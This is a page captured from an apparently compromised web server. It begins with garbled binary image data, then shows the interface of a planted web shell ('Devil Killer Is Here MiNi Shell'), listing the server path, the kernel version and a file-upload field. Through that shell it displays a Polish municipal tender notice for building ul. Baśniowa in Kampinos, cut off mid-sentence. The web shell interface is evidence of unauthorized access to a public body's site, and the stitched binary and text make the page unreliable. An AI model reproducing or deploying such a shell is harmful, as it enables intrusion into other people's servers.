JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250919/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250919/0043285201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ul. Baśniowej w Kampinosie A, gmina Kampinos </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kampinos</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271306</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niepokalanowska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kampinos</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-085</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@kampinos.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.kampinos.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ul. Baśniowej w Kampinosie A, gmina Kampinos </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b092f51-45be-4203-9e28-e3f90432a2e4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00432852</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00015651/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa ul. Baśniowej w Kampinosie A, gmina Kampinos</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kampinos.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem https://kampinos.ezamawiajacy.pl/. zwanej dalej Platformą lub Systemem</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">•	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>•	Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>•	Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługującego TLS 1.2;<br/>•	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych w Urzędzie Gminy Kampinos jest Wójt Gminy Kampinos, ul. Niepokalanowska 3, 05-085 Kampinos;<br/>	Administrator powołał Inspektora Ochrony Danych, z którym można się skontaktować pod adres email: tomasz.szwed@cbi24.pl<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Budowa ul. Baśniowej w Kampinos A, gmina Kampinos”, prowadzonym w trybie podstawowym<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/> zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (tekst jedn. Dz. U. z 2024 r. poz. 1320 z późn. zm.), dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna <br/> Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/><br/>	nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>*Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp<br/>oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, <br/>w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ.271.15.2025.EK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja robót budowlanych w ramach zadania pn. „Budowa ul. Baśniowej w Kampinosie A”. Zakres prac objętych przedmiotową inwestycją to budowa drogi wewnętrznej nr 100111-ul. Baśniowej w miejscowości Kampinos A w gminie Kampinos wraz z odwodnieniem, na działce ewidencyjnej nr 107/20 w obrębie 0009 Kampinos A, w jednostce ewidencyjnej Kampinos. <br/>2. Zamawiający jest w posiadaniu decyzji zatwierdzającej projekt budowlany i udzieleniu pozwolenia na budowę nr 802/2025 z dnia 12.08.2025 r. Decyzja jest załącznikiem nr 11 do niniejszej SWZ. (Dokumentacja techniczna)<br/>3. W ramach zadania pn. „Budowa ul. Baśniowej w Kampinosie A” zaprojektowano jezdnię jednokierunkową bitumiczną o szerokości dostosowanej do istniejących warunków terenowych i granicy pasa drogowego, tj. o szer. 3,5 m i długości około 183,59 m z obustronnymi poboczami o szerokości min. 0,75 m. Na łukach zastosowano lokalne poszerzenia jezdni zgodnie z warunkami technicznymi. Na części ul. Baśniowej zaprojektowano kanalizację deszczową, której trasa w całości usytuowana jest w pasie drogowym. Odbiornikiem wód deszczowych jest istniejąca kanalizacja deszczowa przebiegająca w ulicy Różanej. Włączenie zaplanowano do istniejącego odgałęzienia kanalizacji. Na odcinku od km 0+030,90 do km 0+136,00 (długość ok. 105,1 m) od strony wschodniej zaprojektowano dren z kruszywa dla zapewnienia odwodnienia drogi. Na dalszym odcinku odwodnienie zaprojektowano poprzez wpust deszczowy włączony do istniejącej kanalizacji deszczowej. Do bram zaprojektowano zjazdy klasy D o szerokości min. 5 m ze skosami wybudowane z kostki betonowej.<br/>W pasie drogowym występuje uzbrojenie podziemne – podziemna sieć energetyczna, napowietrzna linia energetyczna, sieć telekomunikacyjna, sieć wodociągowa i gazowa. Istniejące zjazdy do posesji to zjazdy gruntowe oraz z kostki betonowej.<br/> Parametry drogi gminnej : <br/>•	Klasa drogi – D (dojazdowa),<br/>•	Prędkość projektowa – Vp=30 km/h,<br/>•	Kategoria ruchu – KR1,<br/>•	Ilość pasów ruchu – 1,<br/>•	Szerokość jezdni 3,50 m,<br/>•	Pobocza o szerokości min. 0,75 m utwardzone kruszywem.<br/>Pozostałe szczegóły stanu projektowanego przedstawiono na rys. nr 1, 1a „Plan sytuacyjno-wysokościowy”. <br/> Charakterystyczne parametry obiektu budowlanego <br/>•	Jezdnia bitumiczna - 709,11 m² ,<br/>•	Zjazdy z kostki betonowej - 116,87 m²,<br/>•	Chodnik z kostki betonowej – 2,54 m²,<br/>•	Pobocze z kruszywa – 199,18 m²<br/>•	Rozbiórka istniejącej nawierzchni bitumicznej – 51,412 m²<br/>•	Trawniki – 279,21 m²<br/>•	Ogółem powierzchnia zagospodarowania drogowego wynosi F=1 306,91 m²,<br/> Długość budowy drogi wynosi L= 183,59 mb. <br/>Przyjęto projektowaną konstrukcję nawierzchni: <br/>Jezdnia bitumiczna: <br/>•	warstwa ścieralna z asfaltobetonu AC11S gr. 4 cm,<br/>•	warstwa wiążąca z asfaltobetonu AC16W gr. 5 cm,<br/>•	podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 20 cm,<br/>•	podbudowa z gruntu stabilizowanego cementem Rm=2,5 MPa gr. 15 cm.<br/> Łączna grubość: 44 cm.<br/>Pobocza:<br/>•	warstwa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 10 cm,<br/>•	profilowane i zagęszczone podłoże gruntowe.<br/><br/>Zjazdy z kostki betonowej:<br/>•	nawierzchnia z kostki betonowej, bezfazowej (kolorowa, typu „cegiełka”) gr. 8 cm,<br/>•	podsypka cementowo-piaskowa (1:4) gr. 3÷5 cm,<br/>•	podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 15 cm,<br/>warstwa odcinająca z piasku gr. 15 cm.<br/> Chodnik z kostki betonowej:<br/>•	nawierzchnia z kostki betonowej, bezfazowej (kolorowa, typu „cegiełka”) gr. 6 cm,<br/>•	podsypka cementowo – piaskowa (1:4) gr. 3÷5 cm,<br/>•	podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 gr. 10 cm,<br/>•	warstwa odcinająca z piasku gr. 10 cm,<br/>Na terenie poza nawierzchniami drogowymi projektuje się trawniki. <br/>Projektowana inwestycja zlokalizowana jest częściowo na obszarze stanowiska archeologicznego o nr AZP 56-61/1. Zgodnie z decyzją Mazowieckiego Wojewódzkiego Konserwatora Zabytków z dnia 22 lipca 2025 r. (znak: WA.5183.19.4.2025.JG) należy wszelkie prace ziemne związane z realizacją przedmiotowej inwestycji w granicach stanowiska archeologicznego i jego strefy ochronnej określonych w miejscowym planie zagospodarowania przestrzennego przeprowadzić pod stałym, ścisłym nadzorem archeologicznym z rygorem zmiany nadzoru na archeologiczne badania wykopaliskowe w przypadku odkrycia w nadzorowanych wykopach zabytków, obiektów lub nawarstwień archeologicznych. Na ewentualne badania archeologiczne należy uzyskać decyzję Mazowieckiego Wojewódzkiego Konserwatora Zabytków – zgodnie z art. 36 ust. 1 pkt 5 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2024 r. poz. 1292). Wykonawca przyjmuje do wiadomości, że zgodnie z art. 33 ust. 1 wskazanej ustawy wszelkie zabytki archeologiczne odkryte w trakcie realizacji robót stanowią własność Skarbu Państwa. Niedopełnienie obowiązku nadzoru archeologicznego bądź prowadzenie prac ziemnych bez wymaganej decyzji konserwatora naraża Wykonawcę na odpowiedzialność karną przewidzianą w art. 108 ustawy o ochronie zabytków i opiece nad zabytkami.<br/>Sieć wodociągowa<br/>Wykonawca w ramach prac wymieni 9 kpl. zasuw wodociągowych dn 40mm wraz z nawiertkami na sieci wodociągowej dn 90mm. Istniejąca sieć wykonana została z rur kielichowych PCV ciśnieniowych do wody pitnej łączonych ze sobą na wcisk z zastosowaniem uszczelek. Głębokość ułożenia rurociągu waha się w granicach 1,2 - 1,8 m. Należy zamontować nowe zasuwy żeliwne kołnierzowe z miękkim uszczelnieniem wraz z obudową i króćcami jednokołnierzowymi. Zasuwy wodociągowe należy wyposażyć w drążek i zakończyć w żeliwnej skrzynce ulicznej. Drążek zasuwy należy wyprowadzić do wysokości rzędnej projektowanej nawierzchni i osadzić w ulicznej skrzynce wodociągowej. Drążek zasuwy należy zabezpieczyć przed zsunięciem z trzpienia zasuwy za pomocą zawleczki. Położenie skrzynki ulicznej wraz z zasuwą wodociągową należy oznaczyć w terenie tabliczką znakującą wykonaną zgodnie z PN- 86/B-09700. Do nawiertki stosować śruby, podkładki i nakrętki ze stali nierdzewnej lub kwasoodpornej.<br/>Sieć kanalizacyjna<br/>Wykonawca w ramach prac wymieni 2 kpl. pokryw na kanalizacji sanitarnej grawitacyjnej typu ciężkiego z przeznaczeniem na ruch samochodów do 40t a w razie konieczności zastosuje pierścienie odciążające.<br/>Wykonawca w ramach wykonywanych prac przekaże Zamawiającemu kruszywo drogowe pozyskane z frezowania ul. Baśniowej.<br/>4. Wykonawca we własnym zakresie wprowadzi oznakowanie pionowe i poziome drogi zgodnie <br/>z Projektem Stałej Organizacji Ruchu (Załącznik nr. 11 do SWZ – Dokumentacja techniczna).<br/>5. Przed przystąpieniem do prac, trasa drogi winna być wytyczona przez uprawnionego geodetę zatrudnionego przez Wykonawcę, pod ścisłym nadzorem przedstawiciela Zamawiającego. Mapy powykonawcze winny być wykonywane na bieżąco w trakcie wykonywania prac budowlanych tak, aby w dniu zakończenia prac, Wykonawca mógł przekazać Zamawiającemu gotowe mapy powykonawcze.<br/>6. Po wykonaniu prac Wykonawca przekaże Zamawiającemu mapę geodezyjną powykonawczą wykonaną przez uprawnionego geodetę oraz komplet dokumentów, które są wymagane do dokonania zgłoszenia o zakończeniu prac w Powiatowym Inspektoracie Nadzoru Budowlanego. Wykonawca przekaże Zamawiającemu protokoły z badań zagęszczania gruntu oraz atesty i świadectwa zgodności wszystkich użytych do wykonania zadania materiałów.<br/>7. Wszystkie materiały i prace winny być zgodne z rozporządzeniami, przepisami i normami, wyszczególnionymi w projekcie budowlanym dotyczącym przedmiotowego zadania, które uprzednio muszą być zaakceptowane przez Inspektora Nadzoru.<br/>8. Nadmiar urobku ziemnego pozyskanego w wyniku prac ziemnych zostanie przez Wykonawcę zagospodarowany we własnym zakresie, zgodnie z obowiązującymi przepisami prawa. <br/>9. Jeśli do wykonania przedmiotu zamówienia będą konieczne dodatkowe uzgodnienia <br/>z zainteresowanymi instytucjami, Wykonawca wykona je na własny koszt.<br/>10. Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać, co do jakości wymogom wyrobów dopuszczonych do obrotu, stosowania w budownictwie zgodnie z art. 10 Ustawy z dnia 07.07.1994 r. Prawo budowlane, oraz jakościowym i gatunkowym wymaganiom określonym w Specyfikacjach technicznych wykonania i odbioru robót. <br/>11. Szczegółowy zakres zamówienia znajduje się w załączonej dokumentacji technicznej (załącznik nr 11 do SWZ), projekcie Umowy (załącznik nr 6 do SWZ) oraz w przedmiarze robót (załącznik nr 12 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111230-9 - Roboty w zakresie stabilizacji gruntu</p> <p class="mb-0">45112210-0 - Usuwanie wierzchniej warstwy gleby</p> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu:<br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Ustawy Pzp oraz <br/>2)	nie podlegają wykluczeniu na podstawie art. 7 ust. 1 pkt 1-3 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2025 r. poz. 514)<br/>3)	Zamawiający nie przewiduje podstaw wykluczenia wskazanych w art. 109 ust. 1 ustawy Pzp<br/>4)	Samooczyszczenie – Wykonawca nie podlega wykluczeniu w okolicznościach określonych <br/> w art. 108 ust. 1 pkt 1, 2, 5, jeżeli udowodni Zamawiającemu, że spełnił łącznie przesłanki wskazane w art. 110 ust. 2 pkt 1-3 ustawy Pzp<br/>2. spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie 